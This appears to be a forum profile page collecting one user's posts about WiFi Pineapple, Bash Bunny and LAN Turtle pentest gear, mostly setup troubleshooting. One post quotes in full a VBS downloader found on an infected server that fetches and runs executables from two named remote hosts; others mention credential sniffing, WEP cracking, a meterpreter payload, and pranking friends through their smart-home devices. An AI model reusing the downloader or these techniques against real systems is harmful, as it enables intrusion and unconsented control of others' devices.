Jump to content

jermzz

Active Members
  • Posts

    100
  • Joined

  • Last visited

Everything posted by jermzz

  1. If you're connecting by serial then you're in arming mode which doesn't support Ethernet. Use one of the switches and set to Ethernet attack vector. Then you may run the bb.sh and ssh into your bunny. Took me a few min to figure this out as well.
  2. it's not going to work if it needs to run before and after a reboot issuing different key strokes. Especially if it needs to enter an unknown login password
  3. Cd metaspoit-framework directory. Gem install activesupport or gem install bundler bundle install
  4. Keep getting this error recently when cloning. clone_error_06_11_42.txt /pineapple/modules/PortalAuth/includes/scripts/libs/requests/packages/urllib3/connectionpool.py:747: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html InsecureRequestWarning) /pineapple/modules/PortalAuth/includes/scripts/libs/requests/packages/urllib3/connectionpool.py:747: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html InsecureRequestWarning)
  5. Makes perfect sense. It's funny I was going through loops to do something so easy has I just thought about it logically. Guess I don't think out of the box well ? Thanks again nick.
  6. You're right. I misunderstood. I thought you were telling me to tether to my laptop. That should work, didn't even clue into that. Thanks :)
  7. I want to control the pineapple by wifi either than tether from my laptop. Only way I've found so far That works is to use macchanger to clone the mac of my wireless wlan2 with my kali box and then Disconnect / connect the pineapple
  8. You don't need the LAN turtle. Just plug the cord into your computer, then plug your pineapple into the USB port. Share internet to the pineapple, and then you should be able to connect to the management interface via wifi from your other devices. I would strongly suggest disabling your open interface, making a strong password for your management interface and changing your pineapple IP address if you're going to do this... for security reasons.
  9. I have the field kit. It's great. Although it looks like it was made for the MKV. it still works for my nano, but I'd love to see a kit, it would probably have to be marginally larger, that would fit the tetra somehow. The tactical bag isn't really realistic for me when carrying all my other things, and I've been just carrying my tetra in its box in my bag. It works for now, but this is something I'd love to see. A field kit case that carries all the current goodies plus a tetra.
  10. Anyone know a good method to authenticate the pineapple with a portal that makes you click to accept and get internet? Usually I would put my laptop on the wifi and then share internet to the pineapple, but I would like to use client mode and have the pineapple sit by itself and manage it via the management interface. thanks.
  11. Thanks man, this helped me. I couldn't get my terea working for an hour. Ended up starting it like you said, and repeatedly pounding the reset button hard like 50 times, and then the continue button finally worked. Honestly makes me wonder about quality control. I was really distraught that I was about to have to RMA my Tetra. I knew I was doing the process right, as I have a nano which wotks flawlessly now. I say now because my first one was defective, had to get replaced. Additionally, I just read that that some of the pineapple 1500's have the shut off problem..... I got my field kit and didn't use my 1500 for quite a while because I didn't need it really, and because I have a couple other Ankers that work well. Then, when i went to use it 4 (est) months later, it would just turn off when I tried to plug something in. I shrugged it off because who knows what I may have done unknowingly, and the fact that I had more usb chargers made it negligible. I've sent hak5 in total probably $1500 of my hard earned money in total, and it seems that most of my featured products have had major flaws that inhibit it's basic functionality. Replaced nano, broken pineapple juice, abusive handling for my tetra to work properly..... Hopefully at the least hak5 will replace my pineapple juice 1500. I really do like my products when I get them in working order. I'll reach out to them next week. Jeremy
  12. Hey guys, I'm having a little issue getting this all to work. Payload seems fine, portal seems fine, portalauth seems fine. I cloned the starbucks page like you did, downloaded the payload to my windows 10 box, ran it.... I see on Portalauth - Payload "New Target Acquired 172.16.42.213 on port 0" Under Available Targets I see: Address: 172.16.42.213 Port: 0 Hostname: DESKTOP-H960LSR OS: Microsoft Windows NT 6.2.9200.0 But when I go to CursedScreech, Under targets there is nothing available. And thus, when I run Kruo, it times out and no connection is made. Sein is running on br-lan. I have my pineapple connected to the web via usb stick wlan2 and i'm accessing the open pineapple interface via wifi. (making changes and testing on the same machine if that matters, but it shouldn't) I must have missed something, but I can't figure out what. additionally, how could I go about changing the Visual Studio payload to execute a meterpreter session routed to my kali attacker machine rather than CursedScreech? I know I could just substitute the payload, but that negates the functionality of portalauth. thanks nick, everything runs butter smooth. :)
  13. The VM has indeed been recreated. I'll have to ask her what VM she uses. I found this, seems to be what she may have had http://m.theinquirer.net/inquirer/news/2109599/worlds-dangerous-botnet-mines-bitcoins edit: so she was running an old version of Wordpress and MySQL. She was asking for it. Now she knows.
  14. It all started yesterday when she realized her VM, which is a Windows server 2012 r2 machine her friend hosts for her (hyper-v), was running at max load. The only real thing she hosts on it is her personal website that she sells some stuff on for fun. Anyway, upon further inspection, she saw a suspicious process taking up tons of cpu. Looked like a legit Microsoft service except it was in a tmp directory. So obviously a virus. But why? So looking deeper, a script was found in c:\ a vbs script (insert garbage here).vbs here's what was in it. Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://www.game918.me:2545/host.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) afile = "host.exe" aGet.SaveToFile afile,2 Shell.Run (afile) Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.Open "GET","http://huya1219.top/svchost.exe",0 Post.Send() Set aGet = CreateObject("ADODB.Stream") aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) afile = "svchost.exe" aGet.SaveToFile afile,2 Shell.Run (afile) It appears it was downloading executables that were scripts and then copying them to run? Not aire what the point of that would be unless they want to be able to update the script via the web. Anyway, it turns out it scheduled a task to run hourly to run itself again. A bit coin mining service. This little bastard spidered everywhere. My question is HOW did this asshat get in? We ran netstat and found a bunch more stuff. A bunch of modified (or maybe added?) dll files in the MySQL server plugins folder. Im assuming it was some MySQL vulnerablity for arbitrary file upload? I'll post a couple pictures of the files infected. We searched for files modified on the infection date (5/1). We ended up wiping the VM and starting another. No telling what else was infected, or maybe a keylogger.... Crap this sucks. We really just want to know what needs to be patched. Hopefully someone can add some insight. http://imageshack.com/a/img924/108/gsFTxn.jpg http://imageshack.com/a/img921/2816/WCHbBN.png http://imageshack.com/a/img924/1098/2TjwUx.png
  15. I used to use my nexus 7 wifi with my nano. It's just a weird thing to share an already borrowed wifi. Can't use marshmallow. Gotta use 5.1.1 and then the settings will have a USB tether option to enable. You won't be able to get the ip unless you connect with another device to the management interface and then ssh to the nano to run an ifconfig. That will tell you the ip your tablet assigned the nano. Made my life so much easier getting a galaxy s7 on its own line.
  16. Is there certain browser this works better with than others? I got the module installed, and it's capturing connections and displaying them, but I can't get a single sniffed credential. Facebook, Gmail, Hotmail. Tried on safari and chrome with no avail. Even if I click through all the certificate warnings and proceed to the site. Safari won't even let me access https sties regardless.
  17. If you use open VPN, you should be able to put a remote computer on the network with bettercap / whatever you want to do. That's what I do anyway. The target network will just obviously need Internet access.
  18. I've had issues cracking wep using an ap that has just been created for cracking purposes. Same issues. But when I've tried on all real networks with tablets and phones and computers attached, it's only been a short time before ACK requests stated capturing IVs. Try on a real network.
  19. Hello. I have my turtle setup on my network using open VPN to tunnel to my vps. Everything works, but I wish the turtle to assign ips to my home subnet that the turtle resides on instead of its own subnet. Ie turtle subnet is 172.42.x.x and my home network which the turtle is plugged into subnet is 10.0.x.x (comcast) When I connect remotely, my devices are assigned ip 172.42.x.x and I wish them to be 10.0.x.x How can I accomplish this? Almost like I need it to be an access point. I have this in another section but I think it's a better fit question here. Thanks.
  20. I see yes you're right I'm getting a 172.x.x.x address of the turtle on that interface when I run ifconfig on my phone. Is there a way I can make the turtle assign to my 10.0.0.1/24 network my home runs on? I could set up my own VPN at home. But I was looking for a drop and go solution such as the turtle. Can't set a VPN up at my buddy's place.
  21. I know, first response is "yes dummy," but I want to do something kind of specific. My home and most of my friend's are all turning into smart homes. We have an echo controlling our TV and wemo lights and plugs, using harmony and fire TV, etc. All using apps from our phones. I wanted to try and play a little trick on my friends and girlfriend by remotely controlling the home devices remotely when they're using them. I have my turtle currently connected to my home network running open VPN to my digital ocean vps. I can connect to my network remotely with other devices. I can ping devices on my network, Nmap, etc, but I can't use any of the apps designed to work with them directly. Ie: alexa, firetv. I'm assuming this is because the apps look for Internet via (in case of my galaxy s7) wlan0 instead of the tun0 interface my turtle creates with the VPN. When that didn't work because I was not on wifi, I tried to connect my phone to the VPN and then Hotspot it to another device so I'd be on wifi which also failed because of how the VPN works. Does anyone have any idea how I could get something like this to work? Or is it not possible? Devices I have to work with: turtle, nano, kali live USB and nethunter tablet. Tia for any input Jermzz
  22. Interesting. I think you have to pay for tether with att. My plan has hotspot, but I can't use it with my nano because it's an iPhone. Hopefully no problem with the s7, although I'm sure there will be a root method shortly.
  23. Anyone using marshmallow on an att phone? I just ordered an s7 edge. I thought I remembered some problem with marshmallow. Haven't been here in 4 or 5 weeks.
×
×
  • Create New...